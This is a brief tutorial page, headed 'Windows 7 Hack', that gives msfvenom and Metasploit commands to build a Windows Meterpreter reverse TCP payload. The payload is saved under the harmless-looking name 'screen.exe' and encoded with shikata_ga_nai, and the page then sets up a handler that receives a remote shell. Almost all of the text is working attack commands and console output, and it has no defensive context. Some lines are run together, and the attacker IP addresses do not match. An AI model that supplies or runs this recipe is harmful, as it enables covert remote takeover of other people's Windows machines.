MSFVenom Reverse TCP | To create payload | Windows 7 Hack
Windows 7 Hacks
root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.205.129 LPORT=6666 -f exe > screen.exeif no arch selected error
-a x86 --platform Windows -e x86/shikata_ga_nai
-a x64
root@kali:~# msfconsole
msf> Use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.4 (Attacker ip)
LHOST => 192.168.1.4
msf exploit(handler) > set LPORT 6666(Attacker port)
LPORT => 6666
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.4:6666
[*] Starting the payload handler...
meterpreter> cd c:/